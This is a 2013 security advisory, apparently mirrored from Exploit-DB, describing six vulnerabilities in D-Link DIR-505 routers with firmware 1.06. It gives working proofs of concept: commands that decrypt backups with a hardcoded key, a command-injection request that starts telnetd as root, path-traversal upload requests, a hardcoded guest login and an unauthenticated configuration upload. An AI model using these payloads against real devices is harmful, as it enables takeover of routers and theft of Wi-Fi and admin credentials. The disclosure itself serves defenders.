D-Link DIR-505 1.06 – Multiple Vulnerabilities

  • 作者: Alessandro Di Pinto
    日期: 2013-09-10
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/28184/
  • Multiple vulnerabilities on D-Link Dir-505 devices
    Title:		Multiple vulnerabilities on D-Link Dir-505 devices
    Discovery date: 05/04/2013
    Release date: 	09/09/2013
    Credits: 	Alessandro Di Pinto (alessandro.dipinto () artificialstudios org)
    Twitter: 	@adipinto
    This security vulnerability affects the following products and firmware
    * D-Link DIR-505, firmware version <= 1.06
    Other products and firmware versions could also be vulnerable, but they were
    not checked.
    1) Weak configuration file encryption
    The file provided to the end-user in order to make a backup copy of the device
    configuration, is encrypted with a hardcoded password. The device firmware
    creates the configuration file in three specific steps, as shown below:
     - Collect the configuration data to backup
     - Encrypt entries with the hardcoded password "sw5-superman"
     - Create the file header through the tool "imghdr"
    The file header has the fixed-size of 84 byte. An attacker ables to get an
    encrypted configuration file could decrypt its contents with the following
     sh# dd if=config-file of=config-file-no-header bs=84 skip=1
     sh# ccrypt -d -K sw5-superman config-file-no-header
    Decrypted file contains sensitive information that an attacker could use
    in order to compromise the target device (e.g., admin password and WPA
    Furthermore, an attacker can craft a own configuration file, encrypt it with
    the hardcoded password, append at the beginning of file a valid header and
    finally upload the new configuration to the target device without
    authentication, exploiting the "Authentication bypass" issue described inside
    this advisory.
    2) Command Injection
    An authenticated attacker can exploit the "Ping Test" feature exposed inside
    the page "/System_Check.htm", in order to execute arbitrary commands inside the
    device, with root privileges. More precisely, the "ip_addr" parameter is not
    sanitized properly, thus it is possible to leverage traditional command
    injection techniques. This security issue is exploitable only after a
    successful authentication.
    Proof-of-Concept used to open telnet on vulnerable devices:
    POST /my_cgi.cgi HTTP/1.1
    Host: [IP]
    Cookie: uid=[VALID-COOKIE-HERE]
    Content-Length: 55
    request=ping_test&ip_addr=; /usr/sbin/telnetd;
    3) Path traversal (directory listing)
    The web-gui exposed through the port 8181/TCP is used to explore the contents
    of the USB drive, connected at the device. Normally the end-user is allowed to
    list only the files inside the own USB drive but, due to insufficient security
    checks, an attacker is ables to list the contents of every file system
    directories. Only authenticated users can exploit this issue.
    Proof-of-Concept used to list the device's /etc/ directory:
    4) Path traversal (file upload)
    The web-gui exposed through the port 8181/TCP allows authorized users (e.g.,
    admin user) to upload files inside the USB drive connected at the device. The
    upload feature is present at the following link:
    The upload operation is performed through a POST request to the resource
    "/dws/api/UploadFile" using a "multipart/form-data" content-type. Several
    parameters are passed but the "path" parameter can be abused in order to modify
    the destination directory of the uploaded file. This issue allows an
    authenticated user to upload an arbitrary file inside the target device.
    Proof-of-Concept used to upload a simple text file inside the /tmp/ directory:
    POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1
    Host: [IP]:8181
    Cookie: uid=[VALID-COOKIE-HERE]
    Content-Type: multipart/form-data;
    Content-Length: 1179
    Content-Disposition: form-data; name="id"
    Content-Disposition: form-data; name="tok"
    Content-Disposition: form-data; name="volid"
    Content-Disposition: form-data; name="path"
    Content-Disposition: form-data; name="filename"
    Content-Disposition: form-data; name="upload_file"; filename="test.txt"
    Content-Type: text/plain
    malicious text
    5) Privilege escalation (hardcoded credential)
    The upload feature, described in the issue 4 titled "Path traversal (upload
    file)", is theoretically designed to be used only by authorized users (selected
    through the web-gui). The device has the following hardcoded user which cannot
    be deleted using the web-gui:
    username: guest
    password: guest
    Using this credential, the end-user can access the web-gui (exposed on the port
    8181/TCP) in read-only mode; the button used to upload files is disabled in
    attempt to deny unauthorized operations. However due to a wrong session
    handling, an attacker can bypass described limitation following below steps:
    - Login with the hardcoded user "guest" in order to get a valid cookie.
    - Using this cookie it is possible to make a direct upload request like the
    Proof-of-Concept described previously in the issue 4.
    The purpose of this exploit is to perform an arbitrary file upload using an
    hardcoded (read-only) user.
    6) Authentication bypass
    The "my_cgi.cgi" resource exposes several features accessible with no
    authentication. In particular, every request that specifies the HTTP header
    field "Content-type: multipart/form-data" is processed without perform any
    authentication check. An *unauthenticated* attacker can exploit this issue in
    order to upload a malicious configuration on the target device, overwriting the
    original configurations (e.g., set a new admin password).
    Proof-of-Concept used to upload a configuration file without perform the login:
    POST /my_cgi.cgi HTTP/1.1
    Host: [IP]
    Cookie: uid=[VALID-COOKIE-HERE]
    Content-Type: multipart/form-data;
    Content-Length: 382
    Content-Disposition: form-data; name="which_action"
    Content-Disposition: form-data; name="file"; filename="attacker-config.bin"
    Content-Type: text/plain
    D-Link has released an updated firmware version (1.07) that addresses most of
    the described issues. Firmware is already available on D-Link web site, at the
    following URL:
    The author is not responsible for the misuse of the information provided in
    this security advisory. The advisory is a service to the professional security
    community. There are NO WARRANTIES with regard to this information. Any
    application or distribution of this information constitutes acceptance AS IS,
    at the user's own risk. This information is subject to change without notice.